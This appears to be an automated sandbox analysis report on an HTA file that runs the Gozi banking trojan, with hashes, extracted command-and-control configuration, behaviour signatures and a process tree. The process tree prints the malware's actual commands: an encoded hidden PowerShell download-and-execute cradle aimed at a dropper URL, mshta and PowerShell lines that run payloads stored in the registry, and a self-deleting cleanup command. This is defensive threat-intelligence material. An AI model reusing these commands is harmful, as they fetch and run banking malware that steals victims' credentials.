Overview

overview

10

Static

static

1

client_1.hta

windows7-x64

10

client_1.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-10-2023 12:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    client_1.hta

  • Size

    22KB

  • MD5

    57d3eb665f1e9e6a19f278baabd49e7b

  • SHA1

    44566a9d716e6abd0304544dd88d245fea990882

  • SHA256

    4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d

  • SHA512

    30a0a3349aa0b815728abdb0c770d65354cdcf68ca939de4c175bdb285e3d664d7afdddc4be91bae170a65e4f808e6de7cc877fa36442f64f7b7db993e83851d

  • SSDEEP

    384:rO6BO5aa8mOFhyS1q5H8qxAt4VFhmqmfW9PW6vN1v35Zh5LaBY5E6bqBdOfF:4zS0kPWVN5LbtcOfF

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

systemcheck.top
Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3712
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3112
    • C:\Windows\SysWOW64\mshta.exe
      C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\client_1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1752
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1528
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1268
          • C:\Users\Admin\AppData\Local\Temp\mTPJICq.exe
            "C:\Users\Admin\AppData\Local\Temp\mTPJICq.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:3856
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 476
              6⤵
              • Program crash
              PID:452
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Vdcb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vdcb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\79A35AC8-8476-1390-56BD-F8F7EA41AC1B\\\CharControl'));if(!window.flag)close()</script>"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fhnfyilvri -value gp; new-alias -name ordreg -value iex; ordreg ([System.Text.Encoding]::ASCII.GetString((fhnfyilvri "HKCU:Software\AppDataLow\Software\Microsoft\79A35AC8-8476-1390-56BD-F8F7EA41AC1B").TimeAbout))
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4928
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ezpaefhp\ezpaefhp.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4784
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF1F1.tmp" "c:\Users\Admin\AppData\Local\Temp\ezpaefhp\CSC6EA1C544C2D24B6EBA4576AB2CC5D51.TMP"
            5⤵
              PID:4908
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xeh35234\xeh35234.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3020
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF31A.tmp" "c:\Users\Admin\AppData\Local\Temp\xeh35234\CSC87A30233E8E841FDBC45AB4D5F1C8B37.TMP"
              5⤵
                PID:2808
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\mTPJICq.exe"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:4084
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Runs ping.exe
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:4448
        • C:\Windows\syswow64\cmd.exe
          "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
          2⤵
            PID:1524
        • C:\Windows\System32\RuntimeBroker.exe
          C:\Windows\System32\RuntimeBroker.exe -Embedding
          1⤵
            PID:4788
          • C:\Windows\System32\RuntimeBroker.exe
            C:\Windows\System32\RuntimeBroker.exe -Embedding
            1⤵
              PID:4008
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:2476
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3856 -ip 3856
              1⤵
                PID:3532

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Initial Access

              Execution

              Persistence

              Privilege Escalation

              Defense Evasion

              Credential Access

              Discovery

              Query Registry

              1
              T1012

              System Information Discovery

              2
              T1082

              Remote System Discovery

              1
              T1018

              Lateral Movement

              Collection

              Exfiltration

              Command and Control

              Impact

              Resource Development

              Reconnaissance

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                16KB

                MD5

                74485db82616b2c2acfc2bef936cec4c

                SHA1

                8cf9b6bc285bb2be4e6516c5202460839b6f7d2f

                SHA256

                c0956a5d293e33ef617c0bf3ee0a5e236bb2985bf9714a413c81edc368d3a5e5

                SHA512

                3a8e9db585b7229e9bd3690d64921802c6bf6dfa5a0e31ad8ffef9a5d63b219cd8b9841f1710a3153c620c7b24dd847fe31f59b3d6eca3cf1aeae44fe8a880a0

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RESF1F1.tmp
                Filesize

                1KB

                MD5

                b00f28d05d7d59d806270826033bc108

                SHA1

                17004c8556e5adfb4bd7c29605ef9202f671da6f

                SHA256

                793b072ce11ec506fe2b6cb6bf412b65f660f5c3ce89f414c8cf087ec1d248df

                SHA512

                79cdc8b11705e6cf2565b3821c115d66f9b0a123151607b4c7467d0bbabadccdf1dc3e3a08d6fb97cc7ac618414465909a3fc093e3cc2958ad396bc65625ae53

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RESF31A.tmp
                Filesize

                1KB

                MD5

                6e6be88bb28327324121cc9162c8bc3b

                SHA1

                43c22571b6050a540b8222d53aebf6b9e30b899d

                SHA256

                a25f38e25f3418636428e74587370422ed59311e5d91c48179cc45cd87e69d26

                SHA512

                f3a25de75cc93f223eb336380b86cda57712dcd407ee9e57c1066bb551141501fbe13c0297a64a95b1a2497b1509180b035506aa25fb00d2f04471ca8c34203a

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ufow0sf.lit.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\ezpaefhp\ezpaefhp.dll
                Filesize

                3KB

                MD5

                45c122a2735a241f54d631ef4b5f8750

                SHA1

                e70a010629a1c7ffc3b15c8dc2bc862a4da4ecbf

                SHA256

                65046953291d526d59888891d340d014fa401320a6063cc9572d2badf4f1a625

                SHA512

                8bca920b298522dc0d5e2e251709518cb4a92745a34bac3abd49f03f019936eeaedebf8d990cc92b935eee6b5c6eb3725a92152b90391edd99200a1ef60acfff

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\mTPJICq.exe
                Filesize

                293KB

                MD5

                01435632dca9afc151eec77862bfbc2b

                SHA1

                9bbb4ae83131fafcd14d580810b14f48d2d30837

                SHA256

                2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

                SHA512

                61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\mTPJICq.exe
                Filesize

                293KB

                MD5

                01435632dca9afc151eec77862bfbc2b

                SHA1

                9bbb4ae83131fafcd14d580810b14f48d2d30837

                SHA256

                2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

                SHA512

                61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\mTPJICq.exe
                Filesize

                293KB

                MD5

                01435632dca9afc151eec77862bfbc2b

                SHA1

                9bbb4ae83131fafcd14d580810b14f48d2d30837

                SHA256

                2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

                SHA512

                61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\xeh35234\xeh35234.dll
                Filesize

                3KB

                MD5

                cae0f2ab10989aa76a2de70507777280

                SHA1

                bb0e703bd2d1f8ce3b9a6467ef974250b59b2df5

                SHA256

                651c56209b59cab836e0d9b501643ceb22c7cec55e718b27aa06660feef7fea4

                SHA512

                3899ed08e5e4721d4b1bf87c9f9e51b54475e704d2d765639101887c440549d76a6a15c9603de2ae855db96cbf8d35db014a3315f934cadaa66d3b0c481d06bf

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\ezpaefhp\CSC6EA1C544C2D24B6EBA4576AB2CC5D51.TMP
                Filesize

                652B

                MD5

                7a1b8a67600b9a7ef95245bb274be1c5

                SHA1

                edb2dd954aa278d40a251040ba96e85d781b5685

                SHA256

                09dbf5cab9ec6c6368a5f4c82b7980601a5c7aa0af28f64080218f4a08c34e01

                SHA512

                97701630b27ca29b11faf2acb0ecc2ee05ebb34b361ea7f32d649933a8fe576e68d6c50b74cd8a33a0788643e3dbfdcfb81c2bb57cce4d98fa25cc0d5479b826

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\ezpaefhp\ezpaefhp.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\ezpaefhp\ezpaefhp.cmdline
                Filesize

                369B

                MD5

                93ae09bf66405e4799e28e1f51e50dc9

                SHA1

                539f96766ad42c579c7e054026a039396dc913d3

                SHA256

                99730960b1827dd56666e7fe171023f325fa730612d43ded7fbd8ad53e2727e1

                SHA512

                8497b1097af3163ec815af8d566f9fb6783b85f02b58024fa2c16909bfa3b1ebd37beb2b15fa37ff706ff860c5714232530189c382e0ca4f85c601b7095f667f

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\xeh35234\CSC87A30233E8E841FDBC45AB4D5F1C8B37.TMP
                Filesize

                652B

                MD5

                7391f5e352ace3ec424a0e69e0a96156

                SHA1

                7d8ec14f5ce074195fb49253682b1257c8ba2a71

                SHA256

                c26eba1c641c71fce1d3675e50c5bba3091d38f175b58c89b664c0d5566f5afc

                SHA512

                08b344634d13f58dcb7bca045520fcc2a238ed370f4ec0348e84ac9b74bcbafaa74a1c368035897f1f31055eb9c4032d5fbdf9f09ee4d2a9c30e8010cb68b93b

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\xeh35234\xeh35234.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\xeh35234\xeh35234.cmdline
                Filesize

                369B

                MD5

                ff19ebcec0d03ae8b2bd3ac962408894

                SHA1

                f2f23332cf3b8689cb760d9334a021e205c06bf0

                SHA256

                754053a4e978b7acd692cd92598bd5b163369f0cf213efe36d97f1e0b0784ec2

                SHA512

                8e2b4fdfd889464255a2958d11f84a504721b9fbb7010cab4ee3ab26ce984322d6dcfde5481f921a87d69a9c29f36b425e032008e6b9fe801eec7d6d1e688545

                Download Submit
              • memory/1268-25-0x0000000007F40000-0x00000000084E4000-memory.dmp
                Filesize

                5.6MB

                Download
              • memory/1268-1-0x00000000046E0000-0x0000000004716000-memory.dmp
                Filesize

                216KB

                Download
              • memory/1268-5-0x0000000005640000-0x00000000056A6000-memory.dmp
                Filesize

                408KB

                Download
              • memory/1268-0-0x0000000070F60000-0x0000000071710000-memory.dmp
                Filesize

                7.7MB

                Download
              • memory/1268-24-0x0000000007180000-0x00000000071A2000-memory.dmp
                Filesize

                136KB

                Download
              • memory/1268-38-0x0000000070F60000-0x0000000071710000-memory.dmp
                Filesize

                7.7MB

                Download
              • memory/1268-2-0x0000000004860000-0x0000000004870000-memory.dmp
                Filesize

                64KB

                Download
              • memory/1268-16-0x0000000005890000-0x0000000005BE4000-memory.dmp
                Filesize

                3.3MB

                Download
              • memory/1268-6-0x00000000056B0000-0x0000000005716000-memory.dmp
                Filesize

                408KB

                Download
              • memory/1268-3-0x0000000004EA0000-0x00000000054C8000-memory.dmp
                Filesize

                6.2MB

                Download
              • memory/1268-17-0x0000000005CE0000-0x0000000005CFE000-memory.dmp
                Filesize

                120KB

                Download
              • memory/1268-18-0x0000000005D80000-0x0000000005DCC000-memory.dmp
                Filesize

                304KB

                Download
              • memory/1268-19-0x0000000004860000-0x0000000004870000-memory.dmp
                Filesize

                64KB

                Download
              • memory/1268-20-0x0000000007310000-0x000000000798A000-memory.dmp
                Filesize

                6.5MB

                Download
              • memory/1268-4-0x0000000004D10000-0x0000000004D32000-memory.dmp
                Filesize

                136KB

                Download
              • memory/1268-21-0x00000000061E0000-0x00000000061FA000-memory.dmp
                Filesize

                104KB

                Download
              • memory/1268-23-0x00000000071E0000-0x0000000007276000-memory.dmp
                Filesize

                600KB

                Download
              • memory/1524-140-0x00000000007C0000-0x0000000000858000-memory.dmp
                Filesize

                608KB

                Download
              • memory/1524-143-0x00000000005A0000-0x00000000005A1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1524-145-0x00000000007C0000-0x0000000000858000-memory.dmp
                Filesize

                608KB

                Download
              • memory/2476-126-0x000001CB95440000-0x000001CB954E4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/2476-128-0x000001CB94FA0000-0x000001CB94FA1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2476-156-0x000001CB95440000-0x000001CB954E4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3112-135-0x00000000086D0000-0x0000000008774000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3112-95-0x00000000086D0000-0x0000000008774000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3112-96-0x0000000000850000-0x0000000000851000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3712-109-0x000002542FD40000-0x000002542FDE4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3712-110-0x000002542FDF0000-0x000002542FDF1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3712-141-0x000002542FD40000-0x000002542FDE4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3856-42-0x0000000000400000-0x000000000228F000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/3856-43-0x0000000002410000-0x000000000241D000-memory.dmp
                Filesize

                52KB

                Download
              • memory/3856-46-0x0000000002420000-0x0000000002520000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/3856-47-0x0000000000400000-0x000000000228F000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/3856-40-0x0000000002420000-0x0000000002520000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/3856-48-0x00000000023F0000-0x00000000023FB000-memory.dmp
                Filesize

                44KB

                Download
              • memory/3856-41-0x00000000023F0000-0x00000000023FB000-memory.dmp
                Filesize

                44KB

                Download
              • memory/4008-115-0x000001ED077D0000-0x000001ED07874000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4008-116-0x000001ED07790000-0x000001ED07791000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4008-148-0x000001ED077D0000-0x000001ED07874000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4084-133-0x000001D72B790000-0x000001D72B834000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4084-137-0x000001D72B840000-0x000001D72B841000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4084-158-0x000001D72B790000-0x000001D72B834000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4448-147-0x00000132E15C0000-0x00000132E1664000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4448-152-0x00000132E13B0000-0x00000132E13B1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4448-157-0x00000132E15C0000-0x00000132E1664000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4788-121-0x000001AD104D0000-0x000001AD10574000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4788-122-0x000001AD0FD70000-0x000001AD0FD71000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4788-155-0x000001AD104D0000-0x000001AD10574000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4928-63-0x000001E8F3D10000-0x000001E8F3D20000-memory.dmp
                Filesize

                64KB

                Download
              • memory/4928-55-0x000001E8F3D20000-0x000001E8F3D42000-memory.dmp
                Filesize

                136KB

                Download
              • memory/4928-61-0x00007FFB3C170000-0x00007FFB3CC31000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/4928-93-0x000001E8F3EA0000-0x000001E8F3EDD000-memory.dmp
                Filesize

                244KB

                Download
              • memory/4928-62-0x000001E8F3D10000-0x000001E8F3D20000-memory.dmp
                Filesize

                64KB

                Download
              • memory/4928-107-0x000001E8F3EA0000-0x000001E8F3EDD000-memory.dmp
                Filesize

                244KB

                Download
              • memory/4928-106-0x00007FFB3C170000-0x00007FFB3CC31000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/4928-77-0x000001E8F3E70000-0x000001E8F3E78000-memory.dmp
                Filesize

                32KB

                Download
              • memory/4928-91-0x000001E8F3E90000-0x000001E8F3E98000-memory.dmp
                Filesize

                32KB

                Download